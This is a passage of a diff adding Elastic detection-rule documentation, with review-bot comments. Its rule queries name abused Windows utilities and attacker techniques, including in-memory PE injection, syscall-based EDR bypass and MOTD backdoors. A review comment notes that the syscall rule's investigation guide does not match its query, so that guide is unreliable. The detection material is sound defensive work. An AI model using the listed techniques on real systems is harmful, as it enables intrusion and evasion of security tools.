+*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +host.os.type:linux and event.category:network and event.action:(connection_attempted or ipv4_connection_attempt_event) and +process.executable:( + (/etc/crontab or /etc/rc.local or ./* or /boot/* or /dev/shm/* or /etc/cron.*/* or /etc/init.d/* or /etc/rc*.d/* or + /etc/update-motd.d/* or /home/*/.* or /run/* or /srv/* or /tmp/* or /usr/lib/update-notifier/* or /var/tmp/* + ) and not (/tmp/newroot/* or /tmp/snap.rootfs*) + ) and +source.ip:(10.0.0.0/8 or 127.0.0.0/8 
or 172.16.0.0/12 or 192.168.0.0/16) and +not process.name:( + apt or chrome or curl or dnf or dockerd or dpkg or firefox-bin or java or kite-update or kited or node or rpm or + saml2aws or wget or yum or ansible* or aws* or php* or pip* or python* or steam* or terraform* +) and +not destination.ip:( + 10.0.0.0/8 or 100.64.0.0/10 or 127.0.0.0/8 or 169.254.0.0/16 or 172.16.0.0/12 or 192.0.0.0/24 or 192.0.0.0/29 or + 192.0.0.10/32 or 192.0.0.170/32 or 192.0.0.171/32 or 192.0.0.8/32 or 192.0.0.9/32 or 192.0.2.0/24 or + 192.168.0.0/16 or 192.175.48.0/24 or 192.31.196.0/24 or 192.52.193.0/24 or 192.88.99.0/24 or 198.18.0.0/15 or + 198.51.100.0/24 or 203.0.113.0/24 or 224.0.0.0/4 or 240.0.0.0/4 or "::1" or "FE80::/10" or "FF00::/8" +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: https://attack.mitre.org/techniques/T1071/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-pdf-reader-child-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-pdf-reader-child-process.asciidoc new file mode 100644 index 0000000000..d191777b03 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-pdf-reader-child-process.asciidoc 
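Review bot: prebuilt-rule-8-10-5-suspicious-network-activity-to-the-internet-by-previously-unknown-executable.asciidoc has rule type new_terms, yet nothing in the page says which fields the "previously unknown" comparison is made on or over what history window, although the description promises both an unknown executable and an unknown destination IP; list those fields next to "Rule type", because the meaning of an alert depends on them. In the query, the `source.ip:(10.0.0.0/8 or 127.0.0.0/8 or 172.16.0.0/12 or 192.168.0.0/16)` clause means a host whose interface carries a public address (common on cloud instances) never matches, which belongs in a coverage note since the page has no false positive section. Style: "destination ip" in the description should be "destination IP".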
@@ -0,0 +1,143 @@ +[[prebuilt-rule-8-10-5-suspicious-pdf-reader-child-process]] +=== Suspicious PDF Reader Child Process + +Identifies suspicious child processes of PDF reader applications. These child processes are often launched via exploitation of PDF applications or social engineering. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Execution +* Tactic: Initial Access +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Suspicious PDF Reader Child Process + +PDF is a common file type used in corporate environments and most machines have software to handle these files. This creates a vector where attackers can exploit the engines and technology behind this class of software for initial access or privilege escalation. + +This rule looks for commonly abused built-in utilities spawned by a PDF reader process, which is likely a malicious behavior. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Retrieve PDF documents received and opened by the user that could cause this behavior. 
Common locations include, but are not limited to, the Downloads and Document folders and the folder configured at the email client. +- Determine if the collected files are malicious: + - Use a private sandboxed malware analysis system to perform analysis. + - Observe and collect information about the following activities: + - Attempts to contact external domains and addresses. + - File and registry access, modification, and creation activities. + - Service creation and launch activities. + - Scheduled task creation. + - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values. + - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. + + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. + - If the malicious file was delivered via phishing: + - Block the email sender from sending future emails. + - Block the malicious web pages. + - Remove emails from the sender from mailboxes. + - Consider improvements to the security awareness program. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.parent.name : ("AcroRd32.exe", + "Acrobat.exe", + "FoxitPhantomPDF.exe", + "FoxitReader.exe") and + process.name : ("arp.exe", "dsquery.exe", "dsget.exe", "gpresult.exe", "hostname.exe", "ipconfig.exe", "nbtstat.exe", + "net.exe", "net1.exe", "netsh.exe", "netstat.exe", "nltest.exe", "ping.exe", "qprocess.exe", + "quser.exe", "qwinsta.exe", "reg.exe", "sc.exe", "systeminfo.exe", "tasklist.exe", "tracert.exe", + "whoami.exe", "bginfo.exe", "cdb.exe", "cmstp.exe", "csi.exe", "dnx.exe", "fsi.exe", "ieexec.exe", + "iexpress.exe", "installutil.exe", "Microsoft.Workflow.Compiler.exe", "msbuild.exe", "mshta.exe", + "msxsl.exe", "odbcconf.exe", "rcsi.exe", "regsvr32.exe", "xwizard.exe", "atbroker.exe", + "forfiles.exe", "schtasks.exe", "regasm.exe", "regsvcs.exe", "cmd.exe", "cscript.exe", + "powershell.exe", "pwsh.exe", "wmic.exe", "wscript.exe", "bitsadmin.exe", "certutil.exe", "ftp.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Exploitation for Client Execution +** ID: T1203 +** Reference URL: 
https://attack.mitre.org/techniques/T1203/ +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Attachment +** ID: T1566.001 +** Reference URL: https://attack.mitre.org/techniques/T1566/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-portable-executable-encoded-in-powershell-script.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-portable-executable-encoded-in-powershell-script.asciidoc new file mode 100644 index 0000000000..73d6962b84 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-portable-executable-encoded-in-powershell-script.asciidoc 
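Review bot: in prebuilt-rule-8-10-5-suspicious-pdf-reader-child-process.asciidoc the third investigation step has two grammar slips: "the Downloads and Document folders" should be "Documents", and "the folder configured at the email client" should be "configured in". On scope, `process.parent.name` covers exactly four binaries (AcroRd32.exe, Acrobat.exe, FoxitPhantomPDF.exe, FoxitReader.exe) while the description speaks of "PDF reader applications" in general; either state that the rule targets Adobe and Foxit readers or note that other readers are out of scope. The false positive section's single sentence ("This activity is unlikely to happen legitimately") is thin for a child list that includes cmd.exe, powershell.exe and wscript.exe; a line on how to scope an exception (for example on `process.args` or the parent executable path) would help analysts tune without suppressing the rule wholesale.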
@@ -0,0 +1,143 @@ +[[prebuilt-rule-8-10-5-suspicious-portable-executable-encoded-in-powershell-script]] +=== Suspicious Portable Executable Encoded in Powershell Script + +Detects the presence of a portable executable (PE) in a PowerShell script by looking for its encoded header. Attackers embed PEs into PowerShell scripts to inject them into memory, avoiding defences by not writing to disk. + +*Rule type*: query + +*Rule indices*: + +* winlogbeat-* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0109_windows_powershell_script_block_log.md + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Execution +* Tactic: Defense Evasion +* Resources: Investigation Guide +* Data Source: PowerShell Logs + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Suspicious Portable Executable Encoded in Powershell Script + +PowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code. + +Attackers can abuse PowerShell in-memory capabilities to inject executables into memory without touching the disk, bypassing file-based security protections. These executables are generally base64 encoded. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics. +- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Evaluate whether the user needs to use PowerShell to complete tasks. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the script using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. 
+ - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification. + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Related rules + +- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad +- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a +- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved hosts to prevent further post-compromise behavior. 
+- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Reimage the host operating system or restore the compromised files to clean versions. +- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). 
+---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +event.category:process and host.os.type:windows and + powershell.file.script_block_text : ( + TVqQAAMAAAAEAAAA + ) and not user.id : "S-1-5-18" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Process Injection +** ID: T1055 +** Reference URL: https://attack.mitre.org/techniques/T1055/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-process-access-via-direct-system-call.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-process-access-via-direct-system-call.asciidoc new file mode 100644 index 0000000000..8397ff1d00 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-process-access-via-direct-system-call.asciidoc 
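Review bot: the title and the guide heading of prebuilt-rule-8-10-5-suspicious-portable-executable-encoded-in-powershell-script.asciidoc spell "Powershell" while the other rules in this package and the "Data Source: PowerShell Logs" tag on the same page use "PowerShell"; "defences" in the description is also the only British spelling on the page. The query literal `TVqQAAMAAAAEAAAA` is the base64 encoding of the canonical 12-byte DOS header (bytes 4D 5A 90 00 03 00 00 00 04 00 00 00), but the description only says "its encoded header"; spell that out so maintainers know the rule matches this exact string rather than PE content in general, and so the "Related rules" entries make sense as complementary coverage. The final investigation step carries the same out-of-place "after the registry modification" wording as the .NET reflection guide, and like that guide this page lacks a setup note that script block logging must be enabled, even though the only reference it cites is a script block logging policy.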
@@ -0,0 +1,152 @@ +[[prebuilt-rule-8-10-5-suspicious-process-access-via-direct-system-call]] +=== Suspicious Process Access via Direct System Call + +Identifies suspicious process access events from an unknown memory region. Endpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. It's possible to bypass hooked functions by writing malicious functions that call syscalls directly. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-windows.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://twitter.com/SBousseaden/status/1278013896440324096 +* https://www.ired.team/offensive-security/defense-evasion/using-syscalls-directly-from-visual-studio-to-bypass-avs-edrs + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Execution +* Resources: Investigation Guide +* Data Source: Sysmon Only + +*Version*: 209 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Suspicious Process Access via Direct System Call + +Endpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. It's possible to bypass hooked functions by writing malicious functions that call syscalls directly. + +More context and technical details can be found in this [research blog](https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/). + +This rule identifies suspicious process access events from an unknown memory region. 
Attackers can use direct system calls to bypass security solutions that rely on hooks. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the process executable using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. 
+ - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification. + + +### False positive analysis + +- This detection may be triggered by certain applications that install root certificates for the purpose of inspecting SSL traffic. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. 
+ - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove the malicious certificate from the root certificate store. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). 
+---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.code == "10" and + length(winlog.event_data.CallTrace) > 0 and + + /* Sysmon CallTrace starting with unknown memory module instead of ntdll which host Windows NT Syscalls */ + not winlog.event_data.CallTrace : + ("?:\\WINDOWS\\SYSTEM32\\ntdll.dll*", + "?:\\WINDOWS\\SysWOW64\\ntdll.dll*", + "?:\\Windows\\System32\\wow64cpu.dll*", + "?:\\WINDOWS\\System32\\wow64win.dll*", + "?:\\Windows\\System32\\win32u.dll*") and + + not winlog.event_data.TargetImage : + ("?:\\Program Files (x86)\\Malwarebytes Anti-Exploit\\mbae-svc.exe", + "?:\\Program Files\\Cisco\\AMP\\*\\sfc.exe", + "?:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\*\\msedgewebview2.exe", + "?:\\Program Files\\Adobe\\Acrobat DC\\Acrobat\\*\\AcroCEF.exe") and + + not (process.executable : ("?:\\Program Files\\Adobe\\Acrobat DC\\Acrobat\\Acrobat.exe", + "?:\\Program Files (x86)\\World of Warcraft\\_classic_\\WowClassic.exe") and + not winlog.event_data.TargetImage : "?:\\WINDOWS\\system32\\lsass.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Process Injection +** ID: T1055 +** Reference URL: https://attack.mitre.org/techniques/T1055/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Native API +** ID: T1106 +** Reference URL: https://attack.mitre.org/techniques/T1106/ 
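Review bot: the investigation guide in this hunk does not match the rule query. The False positive analysis says the detection "may be triggered by certain applications that install root certificates for the purpose of inspecting SSL traffic", a triage step tells the analyst to look for logins "after the registry modification", and the remediation list says to "Remove the malicious certificate from the root certificate store", while the query matches Sysmon `event.code == "10"` process-access events whose `winlog.event_data.CallTrace` does not begin in ntdll.dll or the wow64 modules. That guidance reads as copied from a root-certificate rule; replace it with text about the process-access event itself (the `process.executable` / `winlog.event_data.TargetImage` pair and the module the call trace starts in). Minor: the query comment should read "which hosts Windows NT syscalls".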
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-process-execution-via-renamed-psexec-executable.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-process-execution-via-renamed-psexec-executable.asciidoc new file mode 100644 index 0000000000..1d59d63053 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-process-execution-via-renamed-psexec-executable.asciidoc 
@@ -0,0 +1,119 @@ +[[prebuilt-rule-8-10-5-suspicious-process-execution-via-renamed-psexec-executable]] +=== Suspicious Process Execution via Renamed PsExec Executable + +Identifies suspicious psexec activity which is executing from the psexec service that has been renamed, possibly to evade detection. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Execution +* Tactic: Defense Evasion +* Data Source: Elastic Endgame +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Suspicious Process Execution via Renamed PsExec Executable + +PsExec is a remote administration tool that enables the execution of commands with both regular and SYSTEM privileges on Windows systems. It operates by executing a service component `Psexecsvc` on a remote system, which then runs a specified process and returns the results to the local system. Microsoft develops PsExec as part of the Sysinternals Suite. Although commonly used by administrators, PsExec is frequently used by attackers to enable lateral movement and execute commands as SYSTEM to disable defenses and bypass security protections. + +This rule identifies instances where the PsExec service component is executed using a custom name. This behavior can indicate an attempt to bypass security controls or detections that look for the default PsExec service component name. 
+ +#### Possible investigation steps + +- Check if the usage of this tool complies with the organization's administration policy. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Identify the user account that performed the action and whether it should perform this kind of action. +- Identify the target computer and its role in the IT environment. +- Investigate what commands were run, and assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts. + +### False positive analysis + +- This mechanism can be used legitimately. As long as the analyst did not identify suspicious activity related to the user or involved hosts, and the tool is allowed by the organization's policy, such alerts can be dismissed. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. + - Prioritize cases involving critical servers and users. +- Isolate the involved hosts to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Review the privileges assigned to the user to ensure that the least privilege principle is being followed. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). 
+---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.pe.original_file_name : "psexesvc.exe" and not process.name : "PSEXESVC.exe" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: System Services +** ID: T1569 +** Reference URL: https://attack.mitre.org/techniques/T1569/ +* Sub-technique: +** Name: Service Execution +** ID: T1569.002 +** Reference URL: https://attack.mitre.org/techniques/T1569/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Rename System Utilities +** ID: T1036.003 +** Reference URL: https://attack.mitre.org/techniques/T1036/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-process-spawned-from-motd-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-process-spawned-from-motd-detected.asciidoc new file mode 100644 index 0000000000..3af40191bb --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-suspicious-process-spawned-from-motd-detected.asciidoc 
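Review bot: in the Suspicious Process Execution via Renamed PsExec Executable file above, the opening description is hard to parse ("Identifies suspicious psexec activity which is executing from the psexec service that has been renamed") and should state what the query checks: a process start where `process.pe.original_file_name : "psexesvc.exe"` but `process.name` is not PSEXESVC.exe. The rule depends entirely on the PE original file name being populated by the data source, which the page should say, because a source that does not parse PE headers will never match. Also, `:` matches case-insensitively in EQL, so the mixed casing of "psexesvc.exe" and "PSEXESVC.exe" works, but using one form in both places avoids the question for readers tuning the rule.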
@@ -0,0 +1,152 @@ +[[prebuilt-rule-8-10-5-suspicious-process-spawned-from-motd-detected]] +=== Suspicious Process Spawned from MOTD Detected + +Message of the day (MOTD) is the message that is presented to the user when a user connects to a Linux server via SSH or a serial connection. Linux systems contain several default MOTD files located in the "/etc/update-motd.d/" and "/usr/lib/update-notifier/" directories. These scripts run as the root user every time a user connects over SSH or a serial connection. Adversaries may create malicious MOTD files that grant them persistence onto the target every time a user connects to the system by executing a backdoor script or command. This rule detects the execution of potentially malicious processes through the MOTD utility. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://pberba.github.io/security/2022/02/06/linux-threat-hunting-for-persistence-initialization-scripts-and-shell-configuration/#10-boot-or-logon-initialization-scripts-motd + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Data Source: Elastic Endgame +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 6 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Suspicious Process Spawned from MOTD Detected + +The message-of-the-day (MOTD) is used to display a customizable system-wide message or information to users upon login in Linux. 
